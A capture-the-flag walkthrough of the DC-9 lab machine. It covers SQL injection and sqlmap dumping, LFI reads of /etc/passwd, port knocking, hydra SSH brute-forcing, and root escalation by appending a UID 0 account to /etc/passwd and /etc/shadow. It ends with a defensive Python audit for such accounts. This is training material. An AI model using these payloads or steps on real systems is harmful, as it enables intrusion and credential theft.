DC-9 (OffSec Proving Grounds)

DC-9 is a multi-step machine: SQL injection leads to credential extraction, which then combines with LFI and port knocking to unlock SSH. Privilege escalation is achieved by abusing a custom script that appends arbitrary content to system files.

Overview

Target: DC-9
Initial vector: SQLi → credentials → LFI → knockd → SSH
Privilege escalation: custom sudo script → append to /etc/passwd and /etc/shadow

Foothold – SQL Injection

The application exposes /display.php and /results.php; the search parameter of results.php is vulnerable to SQL injection.

Basic tests (ORDER BY 7 errors while ORDER BY 6 succeeds, so the query returns 6 columns):

' OR 1=1 ORDER BY 7-- -
' OR 1=1 ORDER BY 6-- -   (6 columns)
Moe' OR 1=1 UNION SELECT 1,2,3,4,5,version()-- -
-> 10.3.17-MariaDB-0+deb10u1

Capture the raw POST request by pointing curl at a netcat listener as its proxy:

$ nc -nlvp 9999
$ curl 'http://192.168.169.209/results.php' \
  --data-raw 'search=Moe%27+OR+1%3D1+UNION+SELECT+1%2C2%2C3%2C4%2C5%2Cversion%28%29--+-' \
  -x http://localhost:9999

Save the captured request as req.txt and feed it to sqlmap:

$ sqlmap -r req.txt --batch -p search --dbs
-> Users, Staff

$ sqlmap -r req.txt --batch -p search --dump -D Users
$ sqlmap -r req.txt --batch -p search --dump -D Staff
-> admin:856f5de590ef37314e7c3bdf6f8a66dc

Cracking the hash gives:

-> transorbital1

Login at /manage.php as admin.

LFI & Port Knocking

After logging in, /manage.php displays "File does not exist", which hints at a file parameter; test it for LFI:

http://192.168.169.209/manage.php?file=../../../../../../../../etc/passwd
http://192.168.169.209/manage.php?file=../../../../../../../../etc/knockd.conf

knockd.conf reveals the port knocking sequence that opens SSH. Knock each port in order with nmap (one port per probe, no retries, so every knock is sent exactly once):

$ nmap -Pn --host-timeout 201 --max-retries 0 192.168.169.209 -p 7469
$ nmap -Pn --host-timeout 201 --max-retries 0 192.168.169.209 -p 8475
$ nmap -Pn --host-timeout 201 --max-retries 0 192.168.169.209 -p 9842

SSH is now open. Run hydra against it with the user and password lists gathered so far:

$ hydra -L Possible-Users.txt -P Possible-Passwords.txt 192.168.169.209 ssh
-> chandlerb : UrAG0D!
-> joeyt     : Passw0rd
-> janitor   : Ilovepeepee

SSH as janitor:

$ ssh janitor@192.168.169.209
Password: Ilovepeepee

~/.secrets-for-putin/passwords-found-on-post-it-notes.txt holds more passwords; use them to build larger user and password lists.

Run hydra again with the extended lists:

$ hydra -L FF-users.txt -P FF-passwords.txt 192.168.169.209 ssh
-> fredf : B4-Tru3-001

Switch to fredf:

$ su fredf
Password: B4-Tru3-001

Privilege Escalation – Custom Append Script

Check sudo:

$ sudo -l
-> /opt/devstuff/dist/test/test

The script reads the contents of one file and appends them to another, and because it runs as root it can write arbitrary content into any file. Abuse it to append a new UID 0 user to /etc/passwd and a matching entry to /etc/shadow.

Create a SHA-512 crypt password hash for the new account:

$ echo -n "123" | openssl passwd -6 -stdin

Create lines:

/tmp/new-etc-passwd-user-line:
testuser77:x:0:0::/home/testuser77:/bin/bash

/tmp/new-etc-shadow-user-line (replace the hash field with the output of the openssl command above):
testuser77:$6$randomsalt$hashedpassword:18936:0:99999:7:::

Run the script via sudo to append each line to its target file, then switch to the new account:

$ su testuser77
Password: 123
# id; whoami
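What this escalation leaves behind is an extra UID 0 account in /etc/passwd with a usable hash in /etc/shadow. The audit below is an added example, not part of the original walkthrough: it parses constructed copies of both files (the testuser77 line and the sample hashes are placeholders modelled on the steps above) and flags such entries, along with any passwd/shadow mismatch.

```python
# Added defensive check, not part of the original DC-9 walkthrough: parse
# /etc/passwd and /etc/shadow text and flag a non-root account with UID or
# GID 0, a hash kept in passwd itself, and passwd/shadow mismatches.
# Both inputs below are constructed samples.

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003:Fred Flintstone,,,:/home/fredf:/bin/bash
testuser77:x:0:0::/home/testuser77:/bin/bash
"""

SHADOW_SAMPLE = """\
root:$6$constructedsalt$constructedhash:18936:0:99999:7:::
daemon:*:18000:0:99999:7:::
fredf:$6$constructedsalt$constructedhash2:18936:0:99999:7:::
testuser77:$6$randomsalt$hashedpassword:18936:0:99999:7:::
"""


def records(text, nfields):
    """Yield colon-split records, skipping blank and comment lines."""
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            fields = line.split(":")
            if len(fields) != nfields:
                raise ValueError(f"malformed line: {line!r}")
            yield fields


def audit_accounts(passwd_text, shadow_text):
    """Return findings for suspicious account entries (empty list if clean)."""
    shadow = {rec[0]: rec[1] for rec in records(shadow_text, 9)}  # name -> hash
    findings, seen = [], set()
    for name, pw, uid, gid, *_ in records(passwd_text, 7):
        if name in seen:
            findings.append(f"duplicate passwd entry: {name}")
        seen.add(name)
        if pw not in ("x", "*", "!"):
            findings.append(f"hash stored directly in passwd: {name}")
        if name not in shadow:
            findings.append(f"passwd entry without shadow entry: {name}")
        elif name != "root" and (uid == "0" or gid == "0"):
            # a "$"-prefixed shadow field is a real hash, so root login works
            usable = shadow[name].startswith("$")
            findings.append(f"non-root UID/GID 0 account: {name} (usable hash: {usable})")
    for name in shadow:
        if name not in seen:
            findings.append(f"shadow entry without passwd entry: {name}")
    return findings
```

Running it on the real files (read as root) turns a one-off check into something a cron job or host agent can repeat after every change to /etc/passwd.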